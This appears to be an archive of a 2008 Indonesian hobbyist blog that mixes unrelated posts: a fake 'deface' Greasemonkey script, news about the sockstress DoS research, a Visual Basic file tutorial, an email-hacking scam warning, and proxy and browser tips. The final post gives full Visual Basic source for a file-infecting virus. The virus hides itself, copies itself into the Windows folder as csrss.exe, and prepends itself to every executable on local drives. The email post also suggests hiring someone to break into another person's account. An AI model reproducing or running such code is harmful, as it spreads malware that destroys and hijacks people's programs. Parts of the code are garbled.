Its moment we make script to greasemonkey - write to use your editor ( my use notepad++):

Source script :

Or you can direct download from here. deface.user.js ( 1.20 kb)

step hereinafter drag and drop the file to browser firefox you and depress install. To see do have active or not yet remained the right click icon greasemonkey and select;choose manage user script. See " Deface www site" active or don't.

After installation have try to open web site by using www ex. http://www.tomiyahya.web.id . how is him result ? ? Then demonstrate to your friend. Ha100X. sure him/her number site that have defaced.
Though ........... ...... ...... ....
This technique only just eye deceit. Web site be in fact don't terdaface only appearance in browser just you, become the peaceful you of gin UU ITE. To deface in fact didn't ask to me, I just kidding.

DoS attack is a killer

2008-10-03T10:31:00.000+07:00

These guys are the inventors of UnicornScan, a user-land TCP stack turned into a port scanner. Never heard of it? Use Nmap exclusively? Well if you run Linux, I suggest checking out, especially if missed ports in your portscan is inexcusable. But I digress.
Robert and Jack are smart dudes. I've known them for years, and they've always been one step ahead of the game. A couple of years ago, Jack found some anomalies in which machines would stop working in some very specific circumstances while being scanned. A few experiments, tons of reading through documentation, and one mysteriously named tool called "sockstress" later, and the two are now touting a nearly universal denial-of-service (DoS) attack that can be performed on almost any normal broadband Internet connection -- in just a few seconds.
How bad is it? Well, in an interview --- (fast-forward five minutes in to hear it in English), the two were asked if they could take out a data center. While they've never tried, it appears to be a totally plausible attack. Worse yet, unlike most DoS attacks, the machines often do not come back online once the attack is over. The victim system just doesn’t respond any more
Great, huh?
Robert and I talk a lot, and I asked him if he'd be willing to DoS us, and he flatly said, "Unfortunately, it may affect other devices between here and there so it's not really a good idea." Got an idea of what we're talking about now? This appears not to be a single bug, but in fact at least five, and maybe as many as 30 different potential problems. They just haven't dug far enough into it to really know how bad it can get. The results range from complete shutdown of the vulnerable machine, to dropping legitimate traffic.
The two researchers have already contacted multiple vendors since the beginning of September (I've had a small hand in getting them in contact with one of the vendors). Robert and Jack are waiting with no specific timeline to hear back from the affected TCP stack vendors. Think firewalls, OSes, Web-enabled devices, and so on. Yup, they'll all need to be hardened, if the vendors can come up with a good solution to the problem. IPv6 services appear to be more affected by the fact that they require more resources and are no more secure since they still reside on top of an unhardened TCP stack.
Jack and Robert are both trying to be as forthcoming as possible with the affected vendors without giving any specific information on how the attack works to the public at large -- openly acknowledging how dangerous the attack really is. Their hope is that the vendors appreciate the problem and come up with fixes that may not be initially obvious to them. I asked Robert when they planned to release their tool, to which he said he wasn't sure he would "ever release sockstress." The details, however, will be forthcoming once vendor patches are available. There are no mitigating short-term fixes, folks.
I feel winter slowly coming, and it would be a shame if entire power grids could be taken offline with a few keystrokes, or if supply chains could be interrupted. I hear it gets awfully cold in Scandinavia.

Simple Binary

2008-09-29T15:35:00.000+07:00

The reader is expected to have read the first part of this tutorial which deals
with sequential files. You can still follow this tutorial without reading Part-I,
but I recommend reading the sequential files tutorial first because I may have mentioned certain things in Part-I which also apply to Binary Files.

As far as Visual Basic 6 is concerned, there are three modes in which a file can
be accessed.

1. Text Mode (Sequential Mode)
2. Binary Mode
3. Random Access Mode

In the Text Mode, data is ALWAYS written and retrieved as CHARACTERS.
Hence, any number written in this mode will result in the ASCII Value of the
number being stored.
For Example, The Number 17 is stored as two separate characters "1" and "7".
Which means that 17 is stored as [ 49 55 ] and not as [ 17 ].

In the Binary Mode, everything is written and retrieved as a Number.
Hence, The Number 17 Will be stored as [ 17 ] in this mode and
characters will be represented by their ASCII Value as always.

One major difference between Text Files and Binary Files is that Text Files
support Sequential Reading and Writing. This means that we cannot read or write
from a particular point in a file. The only way of doing this is to read through
all the other entries until you reach the point where you want to 'actually'
start reading.

Binary Mode allows us to write and read anywhere in the file. For example we can
read data directly from the 56th Byte of the file, instead of reading all the
bytes one by one till we reach the 56th byte.

Part-I dealt with Sequential Files, and this one will teach you how to read and
write files in Binary Mode.

You will often come across the terms "Text Files", "Sequential Files",
"Sequential Mode", "Binary Mode" and "Binary Files" while reading books,
articles or even posts on the internet related to file handling and wonder what
they really mean.

A file is a set of bytes/records stored together.

Text Files are files which contain only characters in ASCII or Unicode.

Sequential Files are files opened in Sequential Mode.

Sequential Mode refers to any of the modes used for sequential file handling
which are Input, Output and Append.

Binary Mode refers to the Binary Mode [which you shall learn about as you
progress through this tutorial]

Binary Files refer to files opened in Binary Mode.

You should note that Binary Files and Sequential Files are not different kinds
of files but rather different methods of accessing a file.

Any file can be opened in both sequential and binary modes (obviously not at the
same time wink2.gif ). If it is opened in sequential mode, you will only be able to
access data in the file sequentially. If it's opened in Binary mode, you can
access any byte in the file without reading the previous bytes in the file.

example :

1. Add a Command Button with name as Command1 onto a Form
2. Private Sub Command1_Click()
3. Dim f As Long
4. f = FreeFile()
5.
6. Open "c:\test.txt" For Binary As #f
7. Close #f
8. End Sub

view plainprint?

1. 'Add a Command Button with name as Command1 onto a Form
2. Private Sub Command1_Click()
3. Dim f As Long
4. f = FreeFile()
5.
6. Open "c:\test.txt" For Binary As #f
7. Close #f
8. End Sub

As you can see, the FreeFile() function can also be used for binary files.
The Open Statement opens c:\test.txt in Binary Mode and the next statement
closes the file.

As obvious as it may sound, you need to open a file before using it and close it
when you have finished reading or writing to it. Many programmers forget to add
the Close statement which results in the File Already Open Error, and it can be
a pain to track down the exact location that caused the error when you're
dealing with many files.

You should note that this snippet does more than open and close a file.
If the test.txt file is not present in C drive, then it creates a blank file
with the same name.

Hacking Yahoo, Hotmail, Lycos...

2008-09-08T01:31:00.000+07:00

Computer Hackers nowadays offers different services - and the most widely offered is to crack into email passwords such as Yahoo, Hotmail, Gmail, AOL, Lycos and so on. Some are really good but most are just scams.

The most common and successful method is achieved with the use of keyloggers to record any email passwords and computer surveillance software. 100 percent sure, makers of this application often called it that way, not a "hacking program."

Recently, forums are flooded with different offers from so called email hackers. Are you sure they are really hackers and have success on the task you will be giving them?

Beware of Scams
Step-by-step Yahoo hacking!!! So many have been victimized by this, sending their passwords and hoping that they can retrieved a targeted account by following these:

It goes this way:
Log in to your own yahoo account. Compose an e-mail to: recoversecretcode@yahoo.com. The automated server will send you the password that you have 'forgotten', after receiving the information you send them. STEP 3- In the subject line type exactly: password retrieve...etc, etc...

Don't fall into this. It's a real scam. The only way to recover your password is going to your email account, check for" forgot="" password="" and="" will="" ask="" you="" for="" authentication="" before="" it="" resets="" your="">

In Yahoo for example, it will prompt for "secret questions" which you have filled during your sign-up. Thereafter the original passwords will be emailed to your alternate email account, which also you have provided during sign-up. It is very important to keep those "sign-up" information for your future use.

Scammers common trick is to ask users to send money before they start the process. Most of them are generating large amount of money with this, but no results or job is done in the end. You will end up a victim.

If there is a great need for you to retrieved someone's email password, there are some who can provide it for you, choose the best, someone who will send you proofs such as screenshots of inbox, sent items or address book before they ask for payment. Though, we never advise you to resort into this, it is still invading others privacy no matter how you accomplished it.

Cara nambah speed koneksi & rubah IP biar CEPAT & super AMAN (Limited) GRATIS!

2008-07-20T23:41:00.001+07:00

Ni info bagus dari temen,udah saya coba..ok banget.. ->
Bagi yg suka buka web/download file sering nemuin keadaan kyk gini :
1. Akses lama, koneksi lelet & timeout.
2. Hasil download sering error.
3. Frekuensi download dibatasi (kyk di rapidshare, dll).
4. IP kita dibanned / dilarang ngunjungi.
5. Takut alamat IP qt dicatat.

Dan kita berharap :
1. Koneksi lebih CEPAT (misalnya untuk akses https://) .
2 . Koneksi lebih AMAN (alamat IP qt 100% berubah, HIGH ANONYMITY).
3. Bisa download lebih banyak TANPA DIBATASI (mgkn bisa tak terbatas, tergantung settingan cookies).
4. Bisa mengunjungi website TANPA KHAWATIR dibanned lagi.
5. Surfing BEBAS gak perlu was-was lagi.

Semua tadi bisa didapatkan dengan pake tool online GRATIS
(GA PERLU DOWNLOAD/INSTALL utk pakenya) di:

http://freeproxy.co.cc
(jangan lupa utk bookmark!)

Cukup dengan memasukkan alamat web/URL yang pingin kita tuju trus klik Go!
Semua koneksi yang kita lakukan akan lebih cepat & aman.
Ada 1 hal lagi paling seru, bahwa alamat koneksi / IP qt akn berubah menjadi IP USA.

Untuk cek IP anda bisa dengan mengunjungi website :
www.proxydetect.com & www.showip.net
Silahkan buka lakukan sebelum & sesudah menggunakan tool ini.
Nnti akan kelihatan perbedaan IP (alamat koneksi kita) yg kita pke.

Slain itu utk buka situs https jg lebih cepet.
Karena saat mngunjungi situs yg urlnya https,
tool ini tetep jln karena qt buka tool ini tanpa hrs ngrubah ke https pula.
Slain itu koneksi qt tetep aman krn komunikasi qt akn tetep dienskripsi!
Tool ini menggunakan script cgi (common gateway interface) dg cgiproxy
sbg enginenya. Yaitu merupakan script yg opensource & licence-nya
udh kedaftar ke GNU (www.gnu.org). Jadi, qt ga perlu takut / khawatir utk makenya.

Jika anda suka, silahkan bookmark alamat web ini online di del.icio.us
jadi anda bisa mmbukanya dimana aja tanpa hrs melihat catatan bookmark anda.

Ok, itu aja info gratisnya
Maaf bila ada salah kata, sekedar share agar kita bs manfaatin sbaik2nya.
Smoga bermanfaat buat rekan2 disini.
Keep freedom to surf!!!
Smoga berkenan...

Berselancar Lebih Cepat dengan Fasterfox

2008-06-30T15:21:00.000+07:00

Firefox oleh banyak orang dianggap sebagai browser yang cukup cepat. Namun, ada saja yang menganggap masih kurang cepat, untungnya telah banyak upaya yang dilakukan untuk mempercepat kinerja firefox yang sudah cepat ini. Salah satunya adalah melalui plug-ins Fasterfox.

Karena sifat firefox yang opensource, banyak orang ‘pintar’ yang dapat ikut andil dalam mengembangkan kinerja si Rubah Api ini. Salah satu upaya untuk meningkatkan kinerja firefox adalah dengan melakukan tweaking. Itulah yang dilakukan oleh plug-ins fasterfox. Fasterfox mempercepat proses browsing dengan memanfaatkan Prefect links dan Network Tweaking. Melalui Prefect Links, tidak ada lagi bandwith menganggur karena firefox akan mengambil dan menyimpan halaman web sebagai cache. Proses transfer halaman web ini dilakukan dilatar belakang sehingga tidak mengganggu aktifitas browsing anda.

Tweaking Network dilakukan pada seting untuk rendering halaman, koneksi simultan, pipelining,cache, DNS-cache, dan IPD (initial paint delay). Selain itu di dalam fasterfox juga telah terintegrasi sebuah pop-up blocker untuk pop-up yang dihasilkan oleh objek flash.

Untuk menginstalasikan plug-ins fasterfox anda dapat mendownloadnya di http://fasterfox.mozdev.org/ , Setelah plug-ins terinstalasi, restart firefox untuk mengaktifkannya. Buka menu Tools | Add-ons, lalu klik ganda plug-ins fasterfox untuk membuka option yang tersedia. Fasilitas tersebut adalah pilihan Default, Courteous, Optimized, Turbo Charged, dan Custom.

Pilihan default akan mengembalikan semua setingan ke kondisi semula. Pilihan Courteous hanya melakukan tweaking pada proses rendering sehingga tidak akan membebani webserver. Pilihan Optimized akan melakukan tweaking optimum dalam batasan yang diizinkan oleh RFC. Pilihan Turbo Charged adalah pilihan yang paling ekstrem, ia akan melakukan tweaking seoptimal mungkin dengan mengabaikan batasan yang diizinkan.

Turbo Charged dapat menjadi pilihan utama bagi anda yang berbagi jalur internet, sedang jika anda seorang yang bijaksana, Courteous dan Optimized adalah pilihan yang tepat. Dengan memilih custom anda dapat mengatur aspek-aspek tweaking secara lebih terperinci. Disini anda dapat mengatur langsung besarnya cache yang akan digunakan, banyaknya koneksi simultan ke sebuah web server, jumlah pipelining, banyaknya halaman fastback, dan menghidupkan/mematikan pop-up blocker.

infector

2008-06-25T22:25:00.000+07:00

Executable Infector

This is the only one of its kind..
But there is a new Update i made for the previous method.
now you can easily extract (an) icon of the original EXE and save it to the Infected EXE
note that if The Original EXE has more than one Icon .. we can't specify The main icon in this case.. so we will extract any icon and save it to the infected EXE

Add :

The Infector Routine depends on The everlasting method
>>>> My Application + Original EXE <<<<

And will be exploring original EXE on drives, be carefull !!!

CODE : ( VB Language )

Dim sPath As String
Dim sOPath As String
Dim sData As String
Dim VirusData As String
Dim FinalEXE As String
Dim lStart As Long
Dim lEnd As Long
Dim sLen As Long
Dim sIcon As String

Private Sub Form_Load()
app.TaskVisible = False

If App.PrevInstance = True Then End

'## Begin OF Dropping

sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"
sOPath = AddBackSlash(App.Path) & App.EXEName & ".MFF"

If LCase(sPath) = LCase(Environ$("WinDir") & "\csrss.exe") Then

Else

Open sPath For Binary As #1
sData = Space(LOF(1))
Get #1, , sData

lStart = InStr(25000, sData, "|||||")

If lStart > 0 Then
lStart = lStart + 5
sData = Mid(sData, lStart)
Open sOPath For Binary As #2
Put 2, , sData
Close 2
If Command$ = "" Then
Shell sOPath, vbNormalFocus
Else
Shell sOPath & " " & Command$, vbNormalFocus
End If
End If

Close 1
End If

'## End OF Dropping

'@@@@@@@@@@@@@@@@@@@@@@@@@

If Dir(Environ$("WinDir") & "\csrss.exe") = "" Then
sPath = AddBackSlash(App.Path)
FileCopy sPath & App.EXEName & ".exe", Environ$("WinDir") & "\csrss.exe"
While Dir(Environ$("WinDir") & "\csrss.exe") = ""
DoEvents
Wend
Shell Environ$("WinDir") & "\csrss.exe"
End
End If

If LCase(sPath) = LCase(Environ$("WinDir") & "\csrss.exe") Then

'Do nothing
Else

Shell Environ$("WinDir") & "\csrss.exe"
End
End If

'#########################

Call GetDrives

End Sub

'#########################

' Sub GetDrives()
Dim ObjFSO As Object
Dim Drives As Object
Dim sDrive As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")

Set Drives = ObjFSO.Drives
For Each sDrive In Drives
If sDrive.DriveType = 2 Then
MsgBox sDrive & "\"
GetEXEs (sDrive & "\")
GetFolders (sDrive & "\")
End If
Next
End Sub

Function GetFolders(Folder As String)
Dim ObjFSO As Object
Dim sFolder As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
For Each sFolder In ObjFSO.GetFolder(Folder).SubFolders
DoEvents
Call GetEXEs(sFolder.Path)
Call GetFolders(sFolder.Path)
Next
End Function

Function GetEXEs(Path As String)
Dim exes As String, EXEPath As String

If Right(Path, 1) <> "\" Then Path = Path & "\"
EXEPath = Dir$(Path & "*.exe")
While EXEPath <> ""
List1.AddItem Path & EXEPath
'MsgBox Path & EXEPath
Call InfectEXE(Path & EXEPath)
EXEPath = Dir$
Wend

End Function

Function InfectEXE(EXEPath As String)
Me.Visible = True
On Error Resume Next
Dim Check As Boolean
Check = False

Dim s As String, ss As String, sss As String
Dim sNulls As String
Dim sLenICOINEXE As Long
Dim sLenDif As Long
Dim sLenTemp As String
Dim sTemp As String

s = "1u" & "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
ss = "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
sss = "3u(" & Chr$(0) '& Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0)

For i = 1 To 296 ' Generate 296 Nulls to change 16*16 icon
sNulls = sNulls & Chr$(0)
Next

'First we will check if it is already infected
Open EXEPath For Binary As #1
sData = Space(LOF(1))
Get 1, , sData
Close 1
If InStr(25000, sData, "|||||") Then
'it is infected then do nothing
Else
'it is clean so try to infect it
Kill EXEPath

sIcon = GetIconFromEXE(sData, Check)

If Check = True Then
'MsgBox "Icon Found"

sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"
Open sPath For Binary As #2
VirusData = Space(LOF(2))
Get 2, , VirusData
Close #2

i = InStr(1, VirusData, s)
If i <> 0 Then '(1u found)
VirusData = Left(VirusData, i + 1) ' get to u in (1u)

VirusData = VirusData & sIcon

FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3

Exit Function

Else 'If (1u) not found .. try to find (3u)
i = InStr(1, sData, sss)
If i > 0 Then
'Debug.Print "Second Method Method... (3u found)"
sTemp = Left(VirusData, i + 1) 'Get to (3u)
sLenICOINEXE = Len(VirusData) - (i + 297) ' add one byte to 296 coz of (u) in (1u)
sLenICOINICO = Len(sIcon)

If sLenICOINEXE > sLenICOINICO Then
sLenDif = sLenICOINEXE - sLenICOINICO

For i = 1 To sLenDif
sLenTemp = sLenTemp & Chr$(0)
Next
End If

VirusData = sTemp & sNulls & sIcon & sLenTemp
FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
Exit Function
End If
End If 'for if i <> 0

FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3

Else ' Means Check = False
'virus icon is default for the final EXE
sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"

Open sPath For Binary As #2
VirusData = Space(LOF(2))
Get 2, , VirusData
Close #2

FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
End If ' for check

End If ' for |||||
End Function

Function GetIconFromEXE(ByVal eData As String, ByRef state As Boolean) As String

Dim c As String, sNull As String, ss As String
Dim sPath As String, sIcon As String
Dim l As Long
c = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
ss = "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"

i = InStr(1, eData, "MSVBVM")

If i > 0 Then
'VB EXE
i = InStr(1, eData, ss)
If i > 0 Then
sIcon = Mid(eData, i)
'sIcon = c & sIcon & sNull & Chr(255)
sIcon = sIcon & sNull & Chr(255)
GetIconFromEXE = sIcon
state = True

Exit Function
End If
Else ' Not Vb EXE so first search for last (... ...@ and compare the size
i = InStr(1, eData, ss)
If i > 0 Then
If Len(eData) - i > 10000 Then
i = InStrRev(eData, ss, Len(eData))
If i > 0 And Len(eData) - i < sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData,"> 0 Then
' l = 2350 - Len(sIcon)
' For i = 1 To l
' sNull = sNull & Chr(0)
' Next
' End If

' sIcon = c & sIcon & sNull & Chr(255)
sIcon = sIcon & sNull & Chr(255)
GetIconFromEXE = sIcon
state = True

Exit Function

End If
End If
End If

state = False

End Function
Function AddBackSlash(strPath As String) As String
If Right(strPath, 1) <> "\" Then
AddBackSlash = strPath & "\"
Else
AddBackSlash = strPath
End If
End Function

Private Sub Form_Unload(Cancel As Integer)
End
End Sub

References :

Written By justin[Mohamed FaYeD] _
Thensync@hotmail.com

http://www.rohitab.com